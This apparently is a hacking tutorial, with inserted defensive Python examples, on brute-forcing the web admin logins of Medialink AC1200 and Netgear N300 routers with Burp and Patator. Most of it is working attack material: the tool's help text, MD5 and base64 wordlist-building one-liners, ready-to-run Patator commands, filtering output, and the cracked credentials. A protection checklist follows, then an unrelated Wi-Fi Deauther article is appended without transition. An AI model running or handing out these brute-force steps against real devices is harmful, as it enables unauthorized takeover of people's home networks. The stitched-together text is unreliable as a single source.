  + umbraco_crack : Crack Umbraco HMAC-SHA1 password hashes
  + tcp_fuzz      : Fuzz TCP services
  + dummy_test    : Testing module

As stated, we’ll focus on the http_fuzz module, designed to brute-force HTTP logins as well as perform various types of web-based injection attacks (e.g., fuzzing). View the available http_fuzz options using the following command.

~# patator http_fuzz --help

Patator v0.7 (https://github.com/lanjelot/patator)
Usage: http_fuzz <module-options ...> [global-options ...]

Examples:
  http_fuzz url=http://10.0.0.1/FILE0 0=paths.txt -x ignore:code=404 -x ignore,retry:code=500
  http_fuzz url=http://10.0.0.1/manager/html user_pass=COMBO00:COMBO01 0=combos.txt -x ignore:code=401
  http_fuzz url=http://10.0.0.1/phpmyadmin/index.php method=POST body='pma_username=root&pma_password=FILE0&server=1&lang=en' 0=passwords.txt follow=1 accept_cookie=1 -x ignore:fgrep='Cannot log in to the MySQL server'

Module options:
  url           : target url (scheme://host[:port]/path?query)
  body          : body data
  header        : use custom headers
  method        : method to use [GET|POST|HEAD|...]
  raw_request   : load request from file
  scheme        : scheme [http|https]
  auto_urlencode: automatically perform URL-encoding [1|0]
  user_pass     : username and password for HTTP authentication (user:pass)
  auth_type     : type of HTTP authentication [basic | digest | ntlm]
  follow        : follow any Location redirect [0|1]
  max_follow    : redirection limit [5]
  accept_cookie : save received cookies to issue them in future requests [0|1]
  proxy         : proxy to use (host:port)
  proxy_type    : proxy type [http|socks4|socks4a|socks5]
  resolve       : hostname to IP address resolution to use (hostname:IP)
  ssl_cert      : client SSL certificate file (cert+key in PEM format)
  timeout_tcp   : seconds to wait for a TCP handshake [10]
  timeout       : seconds to wait for a HTTP response [20]
  before_urls   : comma-separated URLs to query before the main request
  before_header : use a custom header in the before_urls request
  before_egrep  : extract data from the before_urls response to place in the main request
  after_urls    : comma-separated URLs to query after the main request
  max_mem       : store no more than N bytes of request+response data in memory [-1 (unlimited)]
  persistent    : use persistent connections [1|0]

Global options:
  --version             show program's version number and exit
  -h, --help            show this help message and exit

  Execution:
    -x arg              actions and conditions, see Syntax below
    --start=N           start from offset N in the wordlist product
    --stop=N            stop at offset N
    --resume=r1[,rN]*   resume previous run
    -e arg              encode everything between two tags, see Syntax below
    -C str              delimiter string in combo files (default is ':')
    -X str              delimiter string in conditions (default is ',')
    --allow-ignore-failures
                        failures cannot be ignored with -x (this is by design
                        to avoid false negatives) this option overrides this
                        behavior

  Optimization:
    --rate-limit=N      wait N seconds between each test (default is 0)
    --timeout=N         wait N seconds for a response before retrying payload
                        (default is 0)
    --max-retries=N     skip payload after N retries (default is 4) (-1 for
                        unlimited)
    -t N, --threads=N   number of threads (default is 10)

  Logging:
    -l DIR              save output and response data into DIR
    -L SFX              automatically save into DIR/yyyy-mm-dd/hh:mm:ss_SFX
                        (DIR defaults to '/tmp/patator')

  Debugging:
    -d, --debug         enable debug messages

Syntax:
 -x actions:conditions

    actions    := action[,action]*
    action     := "ignore" | "retry" | "free" | "quit" | "reset"
    conditions := condition=value[,condition=value]*
    condition  := "code" | "size" | "time" | "mesg" | "fgrep" | "egrep" | "clen"

    ignore      : do not report
    retry       : try payload again
    free        : dismiss future similar payloads
    quit        : terminate execution now
    reset       : close current connection in order to reconnect next time

    code        : match status code
    size        : match size (N or N-M or N- or -N)
    time        : match time (N or N-M or N- or -N)
    mesg        : match message
    fgrep       : search for string in mesg
    egrep       : search for regex in mesg
    clen        : match Content-Length header (N or N-M or N- or -N)

For example, to ignore all redirects to the home page:
... -x ignore:code=302,fgrep='Location: /home.html'

 -e tag:encoding

    tag        := any unique string (eg. T@G or _@@_ or ...)
    encoding   := "hex" | "unhex" | "b64" | "md5" | "sha1" | "url"

    hex         : encode in hexadecimal
    unhex       : decode from hexadecimal
    b64         : encode in base64
    md5         : hash in md5
    sha1        : hash in sha1
    url         : url encode

For example, to encode every password in base64:
... host=10.0.0.1 user=admin password=_@@_FILE0_@@_ -e _@@_:b64

Please read the README inside for more examples and usage information.

1. Attacking the Medialink AC1200 Router

The first router being attacked is the Medialink AC1200. It’s currently one of Amazon’s top choices for consumer routers and quite popular.

Step 1: Capture a Login Request with Burp

After configuring Firefox with Burp Suite’s Proxy module, navigate to the AC1200’s gateway at http://192.168.8.1/login.html.

Type "password" into the password field and press Enter. Burp will intercept the login and display the request below.

Step 2: Identify the Parameters

Notice the password= parameter isn’t "password" as expected, but instead the scrambled string "5f4dcc3b5aa765d61d8327deb882cf99".

Those familiar with password hashing may recognize it as the MD5 hash of "password". It can be verified with the command below, which pipes the string into md5sum.

~# printf 'password' | md5sum

5f4dcc3b5aa765d61d8327deb882cf99  -

That tells us that the wordlist used when brute-forcing the gateway must be in MD5 format. With this particular router, at the gateway, there’s no available field for username input. We can see from the captured data that the "admin" username is embedded into the request. So there’s only one dynamic parameter: the password.

Step 3: Modify & Save the Raw Request

Change the hashed password parameter to "FILE0" within the request. The modification will act as a placeholder in the request that indicates to Patator where to insert the passwords. (The reason for this will be clear in a later step.)

When that’s done, right-click inside the Burp window and select the "Copy to file" option. Save it to the /tmp directory with the "router_request.txt" filename.

Step 4: Generate a Targeted Wordlist

As we discovered previously, passwords are hashed in the browser before being sent to the router. Patator has a built-in feature to hash passwords, but let’s take this opportunity to learn some Bash password manipulation tricks.

First, download a preferred wordlist. Any generic wordlist will do fine for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.

~# wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

--2020-01-15 03:19:58--  https://git.io/fhhvc
Resolving git.io (git.io)... 52.7.169.168
Connecting to git.io (git.io)|52.7.169.168|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt [following]
--2019-03-08 03:20:01--  https://raw.githubusercontent.com/tokyoneon/1wordlist/master/1wordlist2rulethem%40ll.txt
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.68.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.68.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 25585 (25K) [text/plain]
Saving to: ‘wordlist.txt’

wordlist.txt                      100%[========================================>]  24.99K  68.9KB/s    in 0.4s

2020-01-15 03:20:05 (68.9 KB/s) - ‘wordlist.txt’ saved [25585/25585]

The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be converted into an MD5 and appended to the md5_wordlist.txt file.

~# while IFS= read -r password; do printf '%s' "$password" | md5sum | awk '{print $1}'; done < /tmp/wordlist.txt >> /tmp/md5_wordlist.txt

The new md5_wordlist.txt file can be viewed using the below head command, to print the first ten lines.

~# head /tmp/md5_wordlist.txt

e10adc3949ba59abbe56e057f20f883e
e587466319da83fe4bdf4ceae9746357
dc483e80a7a0bd9ef71d8cf973673924
eba4820c4a707c3c72d16050177423b6
9924d38821446082ce5e4c9d88e1430f
b3d3bdba829b1fef75a5b22c20a14738
5f4dcc3b5aa765d61d8327deb882cf99
e680528370af6ef220d0f23b8e58e812
d234e0453a5f37630379880b9136e959
1acc444503b44377c3ba6e595fcf2940

Step 5: Identify & Filter Failed Requests

With the router_request.txt and the wordlist of hashed passwords, the router’s gateway can be brute-forced with the following Patator command. To stop the brute-force attack at any time, press Control-C on the keyboard.

~# patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

To break that command down:

  • raw_request= — Use the router_request.txt created in an earlier step to generate login attempts against the router’s gateway.
  • accept_cookie= — Save received cookies to issue them in future requests.
  • follow= — Follow Location redirects (e.g., status code 302), for both failed and successful login attempts if instructed by the server.
  • 0= — The "FILE0" placeholder in the router_request.txt will iterate through the provided list of passwords.
  • -l — Save output data into the provided directory. All of Patator’s responses will be stored in an organized fashion.

After running the command, my output looks like this:

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  20:-1          0.015 | e10adc3949ba59abbe56e057f20f883e   |     1 | HTTP/1.0 200 OK
200  20:-1          0.035 | e587466319da83fe4bdf4ceae9746357   |     2 | HTTP/1.0 200 OK
200  20:-1          0.048 | dc483e80a7a0bd9ef71d8cf973673924   |     3 | HTTP/1.0 200 OK
200  20:-1          0.041 | eba4820c4a707c3c72d16050177423b6   |     4 | HTTP/1.0 200 OK
200  20:-1          0.054 | 9924d38821446082ce5e4c9d88e1430f   |     5 | HTTP/1.0 200 OK
200  20:-1          0.060 | 5f4dcc3b5aa765d61d8327deb882cf99   |     7 | HTTP/1.0 200 OK
200  20:-1          0.067 | 1acc444503b44377c3ba6e595fcf2940   |    10 | HTTP/1.0 200 OK
200  20:-1          0.069 | 25d55ad283aa400af464c76d713c07ad   |    11 | HTTP/1.0 200 OK
200  20:-1          0.069 | d8578edf8458ce06fbc5bb76a58c5ca4   |    12 | HTTP/1.0 200 OK
200  20:-1          0.070 | bfcfa776182bf88f23cc0e78bde9bd55   |    13 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5fcfd41e547a12215b173ff47fdd3739   |    14 | HTTP/1.0 200 OK
200  20:-1          0.070 | 02c75fb22c75b23dc963c7eb91a062cc   |    15 | HTTP/1.0 200 OK
200  20:-1          0.079 | b3d3bdba829b1fef75a5b22c20a14738   |     6 | HTTP/1.0 200 OK
200  20:-1          0.070 | f26e6a5828c8a1c908f86c0674c4b0c1   |    16 | HTTP/1.0 200 OK
200  20:-1          0.070 | 0d107d09f5bbe40cade3de5c71e9e9b7   |    17 | HTTP/1.0 200 OK
200  20:-1          0.073 | e680528370af6ef220d0f23b8e58e812   |     8 | HTTP/1.0 200 OK
200  20:-1          0.070 | 25f9e794323b453885f5181f1b624d0b   |    18 | HTTP/1.0 200 OK
200  20:-1          0.086 | d234e0453a5f37630379880b9136e959   |     9 | HTTP/1.0 200 OK
200  20:-1          0.069 | 9aaee58c21bf17a001b5325dffecbb6c   |    19 | HTTP/1.0 200 OK
200  20:-1          0.069 | c41788ac68e6c17c59a6412c424dc763   |    20 | HTTP/1.0 200 OK
200  20:-1          0.069 | 7702417fd301623eff2ba8f6abf05ff6   |    21 | HTTP/1.0 200 OK
200  20:-1          0.069 | a79e7fabc870d2c67141008c58088b47   |    31 | HTTP/1.0 200 OK
200  20:-1          0.069 | e99a18c428cb38d5f260853678922e03   |    22 | HTTP/1.0 200 OK
200  20:-1          0.069 | 4297f44b13955235245b2497399d7a93   |    32 | HTTP/1.0 200 OK
200  20:-1          0.069 | e7d094da9fe5b55c3a84806ba4fd3276   |    23 | HTTP/1.0 200 OK
200  20:-1          0.067 | 9ccc031dbebc6705fc8443df29b0971f   |    33 | HTTP/1.0 200 OK
200  20:-1          0.069 | 04085330aed79347b6427f9111ce384f   |    24 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1c63129ae9db9c60c3e8aa94d3e00495   |    34 | HTTP/1.0 200 OK
200  20:-1          0.069 | ccebddaa34a9459df50d2d32177ea06e   |    25 | HTTP/1.0 200 OK
200  20:-1          0.069 | 5416d7cd6ef195a0f7622a9c56b55e84   |    26 | HTTP/1.0 200 OK
200  20:-1          0.069 | dccfdb716551ca6210e9b93248674dd7   |    27 | HTTP/1.0 200 OK
200  20:-1          0.069 | 1f6cac35000ad57b1af2e34926043ebe   |    28 | HTTP/1.0 200 OK
200  20:-1          0.069 | bed128365216c019988915ed3add75fb   |    29 | HTTP/1.0 200 OK
200  20:-1          0.069 | bc597773a32c44479efd83855733aed6   |    30 | HTTP/1.0 200 OK
200  20:-1          0.071 | d5e0708d403467017d4dd217178112b5   |    41 | HTTP/1.0 200 OK
200  20:-1          0.071 | 161ebd7d45089b3446ee4e0d86dbcf92   |    42 | HTTP/1.0 200 OK
200  20:-1          0.070 | 5dc5d1aa29ea20ce91ec6c7fe5a44f56   |    43 | HTTP/1.0 200 OK
200  20:-1          0.070 | 3d68b18bd9042ad3dc79643bde1ff351   |    44 | HTTP/1.0 200 OK
200  20:-1          0.069 | b76be48e061aa8948d153fec67a08cb4   |    35 | HTTP/1.0 200 OK
200  20:-1          0.071 | 3bf1289e5cd6187c0e0de34edfe27b90   |    45 | HTTP/1.0 200 OK

Hypertext Transfer Protocol (HTTP) status codes, also known as response codes, are issued by web servers to our web browser when we make requests. These codes are a way for web servers to communicate errors to sysadmins, web developers, and end-users alike.

Sometimes the 200 ("200 OK") status code is an indication that the server accepted the provided password. In this case, every single login attempt is producing the "200 OK" response — so it’s actually helping to identify what a failed login attempt looks like.

The „size“ column can also be extremely helpful. It will display the size (in bytes) of the server’s response to the login attempt. It’s returning 20 bytes with every login attempt, so it’s probably safe to assume this byte size indicates a failed login attempt, in which case, it’s safe to omit responses of that size. We can do so by adding the -x ignore:size=20 option and argument.

~# patator http_fuzz raw_request=/tmp/router_request.txt -x ignore:size=20 accept_cookie=1 follow=1 0=/tmp/md5_wordlist.txt -l /tmp/AC1200

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  3962:3363      0.201 | d487dd0b55dfcacdd920ccbdaeafa351   |   291 | HTTP/1.0 200 OK
Hits/Done/Skip/Fail/Size: 1/3142/0/0/3142, Avg: 138 r/s, Time: 0h 0m 22s

Now, only one request is displayed, with a size of 3,962 bytes.

There are a few ways of unhashing a discovered password. The passwords in both wordlist.txt and md5_wordlist.txt appear in the same order. The only difference is that one wordlist is in plain text; the other is hashed.

Below, we’ll use nl to prepend a number to every line in the md5_wordlist.txt, then grep for the hash.

~# nl /tmp/md5_wordlist.txt | grep 'd487dd0b55dfcacdd920ccbdaeafa351'

291 d487dd0b55dfcacdd920ccbdaeafa351

The hash appears on line 291 of the md5_wordlist.txt file. Now, use nl on the plain text wordlist, and grep to find the line number.

~# nl /tmp/wordlist.txt | grep -w '^ *291'

291 yellow

The password is "yellow". It can be further verified using the following command.

~# printf 'yellow' | md5sum

d487dd0b55dfcacdd920ccbdaeafa351

2. Attacking the Netgear N300 Router

A router from the Netgear N300 series is next on the list of targets. It’s also one of Amazon’s top choices for entry-level, consumer Wi-Fi routers.

Step 1: Capture a Login Request with Burp

We’ll follow the same procedure as before, starting with capturing the raw request. Navigate to the router’s gateway using a web browser configured to proxy through Burp. Enter the "admin" and "password" credentials when prompted.

Step 2: Identify the Parameters

Notice that this time there isn’t an obvious password= parameter like with the Medialink AC1200 router.

The above string isn’t hashed with MD5. While it may appear encrypted or secured in some way, it’s using a simple base64 encoding. The string is decoded using the below command.

~# printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password

The username and password are concatenated into a single string and encoded. This authentication method is called basic HTTP authentication. It should only be used with HTTPS, as an attacker on the network can easily capture the credentials in transit.
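As an added illustration (not code from the original article), the two credential formats captured above side by side: a Basic header decodes straight to the cleartext pair, and a browser-hashed MD5 is accepted by the server as-is, so the hash itself becomes the secret. The HardenedLogin class shows the contrasting server-side design (salted PBKDF2, constant-time compare, per-client lockout); the request strings, salt and lockout parameters are constructed for the example.

```python
"""Added example: why neither client-side MD5 nor Basic auth protects a password,
beside a hardened server-side check. Requests, salt and passwords are constructed."""
import base64
import hashlib
import hmac
import os
import time

# Constructed requests modelled on the two captures described in the article.
MEDIALINK_BODY = "username=admin&password=5f4dcc3b5aa765d61d8327deb882cf99"
NETGEAR_HEADER = "Authorization: Basic YWRtaW46cGFzc3dvcmQ="


def decode_basic_auth(header):
    """Basic auth is base64 encoding, not encryption: anyone who sees the
    request over plain HTTP reads the user and password directly."""
    token = header.split("Basic ", 1)[1].strip()
    user, _, password = base64.b64decode(token).decode("utf-8").partition(":")
    return user, password


def md5_from_body(body):
    """Pull the browser-hashed password out of the form body."""
    params = dict(pair.split("=", 1) for pair in body.split("&"))
    return params["password"]


# What a router that hashes in the browser effectively stores and compares.
STORED_MD5 = hashlib.md5(b"password").hexdigest()


def weak_verify(submitted_md5):
    """Router-style check: the server compares the hash the browser sent with
    the hash it stores. Client-side MD5 makes the hash itself the secret: a
    captured hash replays as-is, and an unsalted MD5 of a dictionary word is
    reversed with the nl/grep trick shown above."""
    return submitted_md5 == STORED_MD5


class HardenedLogin:
    """Contrast: password hashed server-side with a salt and a slow KDF,
    compared in constant time, with a per-client lockout after repeated
    failures. Constructed design, not the firmware of either router."""

    LOCK_AFTER = 5        # failed attempts before a client is locked out
    LOCK_SECONDS = 60     # lockout duration in seconds
    ITERATIONS = 100_000  # PBKDF2 work factor

    def __init__(self, password, salt=None, clock=time.monotonic):
        self.salt = salt if salt is not None else os.urandom(16)
        self.digest = self._derive(password)
        self.clock = clock            # injectable for deterministic testing
        self._failures = {}           # client -> (count, locked_until)

    def _derive(self, password):
        return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                   self.salt, self.ITERATIONS)

    def verify(self, client, password):
        """Return 'ok', 'denied' or 'locked'. A locked client gets 'locked'
        even for the right password, so a brute-forcer cannot spot a hit."""
        count, locked_until = self._failures.get(client, (0, 0.0))
        now = self.clock()
        if now < locked_until:
            return "locked"
        if hmac.compare_digest(self._derive(password), self.digest):
            self._failures.pop(client, None)
            return "ok"
        count += 1
        if count >= self.LOCK_AFTER:
            count, locked_until = 0, now + self.LOCK_SECONDS
        self._failures[client] = (count, locked_until)
        return "denied"
```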

Step 3: Modify & Save the Raw Request

With the username and password parameters identified, the raw request is modified to include the Patator placeholder ("FILE0") and saved to a local file.

Right-click inside the window and select the "Copy to file" option. Save it to the /tmp directory with the "router_request.txt" filename.

Step 4: Generate a Targeted Wordlist

Now that we know the kind of authentication parameter being used, a wordlist can be generated specific to the router. Again, Patator has a built-in feature to encode passwords, but string manipulation with Bash is a good skill to learn. It can be applied to other brute-forcing tools, for example.

Download a generic wordlist for testing purposes. Use the below wget command to download my wordlist generated by analyzing leaked databases.

~# wget 'https://git.io/fhhvc' -O /tmp/wordlist.txt

The below Bash one-liner will use a while loop to iterate through the passwords in the wordlist. Each password will be concatenated with the username into a single admin:password string and converted into base64. All of the encoded strings are appended to the /tmp/base64_wordlist.txt file.

~# while IFS= read -r password; do printf '%s' "admin:$password" | base64; done < /tmp/wordlist.txt >> /tmp/base64_wordlist.txt

The encoded passwords can be verified using the below head command to print the first ten lines of the file.

~# head /tmp/base64_wordlist.txt

YWRtaW46MTIzNDU2
YWRtaW46QWJjZGVmMTIz
YWRtaW46YTEyMzQ1Ng==
YWRtaW46bGl0dGxlMTIz
YWRtaW46bmFuZGEzMzQ=
YWRtaW46Tjk3bm9raWE=
YWRtaW46cGFzc3dvcmQ=
YWRtaW46UGF3ZXJqb24xMjM=
YWRtaW46NDIxdWlvcHkyNTg=
YWRtaW46TVl3b3JrbGlzdDEyMw==

Step 5: Identify & Filter Failed Requests

The router’s gateway can be brute-forced with Patator using the router_request.txt and base64_wordlist.txt files. Remember, while in progress, Patator can be stopped at any time by pressing Control-C on the keyboard.

~# patator http_fuzz raw_request=/tmp/router_request.txt accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
401  508:-1         0.006 | YWRtaW46MTIzNDU2                   |     1 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46MTIzNDU2Nzg=               |    11 | HTTP/1.0 401 Unauthorized
401  508:-1         0.022 | YWRtaW46Y2h1cnUxMjNB               |    21 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46QWJjZGVmMTIz               |     2 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46cXdlcnR5                   |    12 | HTTP/1.0 401 Unauthorized
401  508:-1         0.007 | YWRtaW46YTEyMzQ1Ng==               |     3 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bmtzMjMwa2pzODI=           |    13 | HTTP/1.0 401 Unauthorized
401  508:-1         0.024 | YWRtaW46bGl0dGxlMTIz               |     4 | HTTP/1.0 401 Unauthorized
401  508:-1         0.025 | YWRtaW46bmFuZGEzMzQ=               |     5 | HTTP/1.0 401 Unauthorized
401  508:-1         0.026 | YWRtaW46enhjdmJubQ==               |    15 | HTTP/1.0 401 Unauthorized
401  508:-1         0.023 | YWRtaW46Tjk3bm9raWE=               |     6 | HTTP/1.0 401 Unauthorized

HTTP status codes are split into several categories or "classes". The first digit defines the category, and the following digits are subcategories specific to different types of error messages. For example, the 4xx category is a class of errors specific to HTTP requests that cannot be fulfilled by the web server, like trying to view a webpage that doesn’t exist. That’s defined as status "404 Not Found", probably one of the most well-known status codes on the internet.

We immediately notice a ton of 401 status codes in the Patator output, which are clear indications of failed login requests. These are omitted from the output using the -x ignore:code=401 option and argument.

~# patator http_fuzz raw_request=/tmp/router_request.txt -x ignore:code=401 accept_cookie=1 follow=1 0=/tmp/base64_wordlist.txt -l /tmp/N300

code size:clen       time | candidate                          |   num | mesg
-----------------------------------------------------------------------------
200  622:-1         0.017 | YWRtaW46cGFzc3dvcmQ=               |     7 | HTTP/1.0 200 OK

This time, we received only one request with the 200 status code. The size of the response is 622 bytes, more than that of a failed 401 response. It’s a good sign. The login credentials are decoded using the following command.

~# printf 'YWRtaW46cGFzc3dvcmQ=' | base64 -d

admin:password
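The same pattern is visible from the router or web server’s side of the connection, which is where a defender would catch it. Below is an added example (not part of the original tutorial or of Patator) that reads constructed access-log lines carrying the Basic Authorization header, counts 401 responses per client, flags a 200 that follows a run of failures, and decodes the header to show it is only base64, not encryption; the log format, IP addresses and timestamps are made up for this illustration.

```python
from __future__ import annotations

import base64
import re
from collections import defaultdict

# Constructed sample lines (not real traffic) in Apache combined-log style
# with the request's Authorization header appended, as a LogFormat using
# %{Authorization}i would record it. The base64 values are the same guesses
# shown in the Patator output above.
SAMPLE_LOG = """\
192.168.0.23 - - [02/Mar/2020:10:00:01 +0000] "GET /login.htm HTTP/1.0" 401 508 "Basic YWRtaW46MTIzNDU2"
192.168.0.23 - - [02/Mar/2020:10:00:01 +0000] "GET /login.htm HTTP/1.0" 401 508 "Basic YWRtaW46cXdlcnR5"
192.168.0.23 - - [02/Mar/2020:10:00:02 +0000] "GET /login.htm HTTP/1.0" 401 508 "Basic YWRtaW46YTEyMzQ1Ng=="
192.168.0.23 - - [02/Mar/2020:10:00:02 +0000] "GET /login.htm HTTP/1.0" 401 508 "Basic YWRtaW46bGl0dGxlMTIz"
192.168.0.23 - - [02/Mar/2020:10:00:03 +0000] "GET /login.htm HTTP/1.0" 401 508 "Basic YWRtaW46enhjdmJubQ=="
192.168.0.23 - - [02/Mar/2020:10:00:03 +0000] "GET /login.htm HTTP/1.0" 200 622 "Basic YWRtaW46cGFzc3dvcmQ="
192.168.0.50 - - [02/Mar/2020:10:00:04 +0000] "GET /login.htm HTTP/1.0" 200 622 "Basic YWRtaW46cGFzc3dvcmQ="
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<code>\d{3}) (?P<size>\d+|-) "Basic (?P<b64>[A-Za-z0-9+/=]+)"$'
)


def decode_basic(b64: str) -> tuple[str, str]:
    """Split an HTTP Basic credential into (user, password).

    This is plain base64, not encryption: anyone who sees the request on
    the wire (plain HTTP, no TLS) recovers the password exactly like this.
    """
    raw = base64.b64decode(b64).decode("utf-8", errors="replace")
    user, _, password = raw.partition(":")
    return user, password


def analyze(log_text: str, threshold: int = 5) -> dict[str, dict]:
    """Per client IP, count 401 responses and note whether a 200 followed
    them. Returns only the IPs that look like a brute-force attempt
    (failures >= threshold) or a brute force that succeeded."""
    stats: dict[str, dict] = defaultdict(
        lambda: {"failures": 0, "success_after_failures": False,
                 "success_size": None, "usernames": set()}
    )
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # lines without a Basic header are not login attempts
        rec = stats[m["ip"]]
        user, _ = decode_basic(m["b64"])  # keep the username; never log the password
        rec["usernames"].add(user)
        if m["code"] == "401":
            rec["failures"] += 1
        elif m["code"] == "200" and rec["failures"] > 0:
            # A 200 after a run of 401s from the same client is the
            # server-side view of the single 200 line in the Patator output.
            rec["success_after_failures"] = True
            rec["success_size"] = int(m["size"])
    return {ip: r for ip, r in stats.items()
            if r["failures"] >= threshold or r["success_after_failures"]}
```

Run against a real log, the only change needed is a LogFormat that records the Authorization header; the 508-byte 401 and 622-byte 200 sizes seen in the Patator run show up here as the size field.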

How to Protect Yourself from Router Gateway Attacks

Regularly updating the firmware will help protect against exploits and Routersploit attacks. A strong (non-default) password will prevent brute-force attacks performed with Patator.

  • Update the firmware. Router manufacturers often issue bug and exploit patches. It’s important to keep the router firmware up to date and have it check for updates automatically if possible.
  • Disable remote administration. Some consumer routers allow for remote access by default. Without knowing it, hackers may find your router on Shodan and seize control of it.
  • WPA2 encryption. Only use WPA2 encryption. Weaker encryption options like WEP will leave the router extremely vulnerable to attackers.
  • Change default passwords. Never use the default credentials. In addition to the WPA2 pre-shared key, the admin portal (router gateway) should also be protected by a strong password. It’s the only defensive measure preventing an attacker from discovering default credentials and modifying sensitive settings.
  • Disable WPS. WPS is featured in most consumer routers and designed to make password-less authentication more convenient. Unfortunately, the feature is usually enabled by default and easily exploited by hackers.
  • Be persistent. Change your Wi-Fi password every few months. It’s a pain to update the Wi-Fi password for every device on the network, but this tactic will keep hackers guessing — literally. If a hacker has captured the WPA2 handshake and spends several weeks trying to crack the password, changing it will render the captured handshake useless.

Unfortunately, none of the routers I tested support HTTPS when authenticating the admin settings. So an attacker on the network inspecting traffic will be able to passively discover the login password — even if it’s a totally random 42-character password.

Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi Deauther

The price of hacking Wi-Fi has fallen dramatically, and low-cost microcontrollers are increasingly being turned into cheap yet powerful hacking tools. One of the most popular is the ESP8266, an Arduino-programmable chip on which the Wi-Fi Deauther project is based. On this inexpensive board, a hacker can create fake networks, clone real ones, or disable all Wi-Fi in an area from a slick web interface.

The Rise of Microcontrollers as Offensive Wi-Fi Tools

Wi-Fi hacking has usually relied on a couple of pieces of hardware to do the trick. First, you’d need a computer capable of running whatever attack program you’re trying to use. Second, you’d need a wireless network adapter with a chipset that supports whatever bad Wi-Fi thing you’re trying to do. Things could get expensive, with the cheapest combination of a Raspberry Pi and a wireless network adapter still coming in at around $70 to get started.

For a lot less, microcontrollers are capable of many of the same attacks the larger and more expensive Raspberry Pi can do. While a microcontroller isn’t capable of running a full operating system like Kali Linux, microcontrollers are often easier to use because of the simple way in which they are programmed. It’s made even simpler by the fact that these microcontrollers can be programmed in the popular Arduino IDE, allowing projects to be easily shared.

While Wi-Fi-enabled microcontrollers like the ESP8266 do not officially support attacking Wi-Fi networks, an old SDK allows a hacker to build packets manually, thus being able to emulate many kinds of useful packets. That led CS student and chicken-in-space Stefan "Spacehuhn" Kremser to create the Wi-Fi Deauther, a program for the ESP8266 capable of several powerful Wi-Fi attacks.

The ESP8266 Deauther Program

The most useful packets the Wi-Fi Deauther can create are deauthentication and disassociation packets. These packets are often abused because they are unauthenticated, meaning anyone on a network can send them to anyone else while pretending the messages are coming from the router. When a device on the Wi-Fi network receives the packet, it immediately disconnects from the network. The Wi-Fi Deauther does this over and over, spamming connected devices with "disconnect" messages. It results in a "jamming" effect on the network as devices cannot connect fast enough to avoid being instantly kicked off.

That’s not the only trick the Deauther program has up its sleeve. It’s also capable of scanning for both nearby access points and connected devices, and cloning any Wi-Fi network it sees. It can also generate dozens of fake Wi-Fi networks with any names you want, monitor channels for packet traffic between devices, and do all of this from a fancy built-in web interface similar to a Wi-Fi Pineapple.
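Because these frames carry no authentication, the practical signal for a defender monitoring the air is their rate and their addressing, not their contents. The following is an added example (not part of the original article or of the Deauther project) that flags a deauthentication flood from constructed capture records; the frame() helper, the AP, CLIENT and BROADCAST addresses and the timestamps are all made up for this illustration.

```python
from collections import defaultdict, deque

# 802.11 management-frame subtypes (type 0) that drop a client's association.
DEAUTH, DISASSOC = 0x0C, 0x0A


def frame(ts, subtype, src, dst, bssid, reason):
    """Minimal record of a captured management frame (constructed data)."""
    return {"ts": ts, "subtype": subtype, "src": src, "dst": dst,
            "bssid": bssid, "reason": reason}


# Constructed addresses and capture, not from any real network.
AP = "aa:bb:cc:dd:ee:01"
CLIENT = "11:22:33:44:55:66"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# One legitimate deauth (the client leaving, reason code 3), then 40
# broadcast deauths 20 ms apart that claim to come from the AP with
# reason code 7: the "disconnect" spam described above.
SAMPLE_FRAMES = [frame(0.000, DEAUTH, CLIENT, AP, AP, 3)] + [
    frame(5.0 + i * 0.02, DEAUTH, AP, BROADCAST, AP, 7) for i in range(40)
]


def detect_deauth_flood(frames, window_s=1.0, threshold=10):
    """Sliding-window rate check of deauth/disassoc frames per BSSID.

    Returns {bssid: {"first_ts", "peak", "broadcast_from_ap"}} for every
    BSSID whose rate reached `threshold` frames within `window_s` seconds.
    Without 802.11w (Protected Management Frames) these frames carry no
    authentication, so rate and addressing are the only usable signals.
    """
    recent = defaultdict(deque)           # bssid -> timestamps inside the window
    broadcast_from_ap = defaultdict(int)  # bssid -> deauths to everyone, "from" the AP
    alerts = {}
    for f in sorted(frames, key=lambda x: x["ts"]):
        if f["subtype"] not in (DEAUTH, DISASSOC):
            continue
        b = f["bssid"]
        if f["src"] == b and f["dst"] == BROADCAST:
            broadcast_from_ap[b] += 1     # real APs rarely deauth everyone at once
        q = recent[b]
        q.append(f["ts"])
        while q and f["ts"] - q[0] > window_s:
            q.popleft()
        if len(q) >= threshold:
            a = alerts.setdefault(b, {"first_ts": f["ts"], "peak": 0})
            a["peak"] = max(a["peak"], len(q))
            a["broadcast_from_ap"] = broadcast_from_ap[b]
    return alerts
```

The single client-initiated deauth at the start never trips the threshold, while the flood is reported with the moment it crossed the threshold and the peak frames seen in one window.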

